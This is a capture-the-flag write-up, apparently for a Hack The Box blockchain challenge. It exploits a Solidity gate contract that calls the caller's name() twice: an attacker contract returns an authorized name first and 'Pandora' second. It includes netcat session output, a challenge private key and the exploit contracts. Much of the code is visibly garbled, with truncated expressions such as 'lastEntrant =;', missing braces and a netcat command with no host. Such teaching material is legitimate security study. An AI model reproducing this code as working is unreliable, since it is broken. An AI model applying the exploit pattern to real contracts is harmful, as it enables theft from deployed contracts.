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Blockchain: The Art of Deception



Connect to IP2 to get the connection details:

$ nc 32094
1 - Connection information
2 - Restart Instance
3 - Get flag
action? 1

Private key     :  0xaed670f921dc66aa949185dac3a38f78638807bb0932b0340473203431678123
Address         :  0xD91878cAF52230be2645862A639487953a04Dadd
Target contract :  0x5337a93f98ae379b878fB4969Ec9370B83CF5618
Setup contract  :  0x7B59De9FdAd4b0A4B0366677A971A41E24132DBF

Win Condition (Study the Smart Contract)

In the Setup contract we see that in order to solve this challenge, the last person to enter a high security gate needs to be named "Pandora".

function isSolved() public view returns (bool) {
  return TARGET.strcmp(TARGET.lastEntrant(), "Pandora");

The Smart Contract ensures, that we shoot these shots in order (first, second, third). Info modifier

pragma solidity ^0.8.18;

interface Entrant {
    function name() external returns (string memory);

contract HighSecurityGate {

    string[] private authorized = ["Orion", "Nova", "Eclipse"];
    string public lastEntrant;

    function enter() external {
        Entrant _entrant = Entrant(msg.sender);

        require(_isAuthorized(, "Intruder detected");
        lastEntrant =;

    function _isAuthorized(string memory _user) private view returns (bool){
        for (uint i; i < authorized.length; i++){
            if (strcmp(_user, authorized[i])){
                return true;
        return false;

    function strcmp(string memory _str1, string memory _str2) public pure returns (bool){
        return keccak256(abi.encodePacked(_str1)) == keccak256(abi.encodePacked(_str2)); 

After studying the Smart Contact in detail, we find the vulnerability is most likely in the enter function:

function enter() external {
  Entrant _entrant = Entrant(msg.sender);

  require(_isAuthorized(, "Intruder detected");
  lastEntrant =;

The entrant is set to a value we have control over. It is derived from msg.sender. In Solidity msg.sender means the "The entity that sent me this request". So we can manipulate the by creating a Smart Contact that interacts with the HighSecurityGate Contract:

pragma solidity ^0.8.18;

# Copied from HighSecurityGate
interface Entrant { 
    function name() external returns (string memory);

contract Attacker is Entrant {
  bool public firstCheck = true;
  string public _name = "Orion";

  function name() external returns (string memory){
    return _name;


To call the already deployed Smart Contract, I followed the example from here:

Lets add a method with a parameter pointing to the TARGET contract and call enter() on it:

import {HighSecurityGate} from "./FortifiedPerimeter.sol";


function callSecGate(HighSecurityGate _gate) external {

With this we can access the Gate as "Orion".

Prepare the Exploit

If we look at the HighSecurityGate again, we notice that is called two separate times.

require(_isAuthorized(, "Intruder detected");
lastEntrant =;

Once to check if the entrant is authorized and once again to save the name of the last person that entered the gate. Notice that there is no check if returns the same value twice. This is our attack vector :devil:.

We adjust our Attacker smart contact so name return something different the second time it is called.

pragma solidity ^0.8.18;

interface Entrant {
    function name() external returns (string memory);

import {HighSecurityGate} from "./FortifiedPerimeter.sol";

contract Attacker is Entrant {
  bool public firstCheck = true;

  function name() external returns (string memory){
    if (firstCheck){
      firstCheck = false;
      return "Orion";
    return "Pandora";

  function callSecGate(HighSecurityGate _gate) external {

  // Just in case
  function reset() external {
   firstCheck = true;

Execute the Plan

To compile and deploy our Attacker Contact, I used the Remix VSCode extension.

use-compile-and deploy

First we connect to the RPC IP given to us by HTB (IP1 from above):


Then we compile the Smart Contract and deploy it on the blockchain.


To execute our attack, we supply the target address to our callSecGate() method.



With this we can collect our reward:

nc 32094
1 - Connection information
2 - Restart Instance
3 - Get flag
action? 3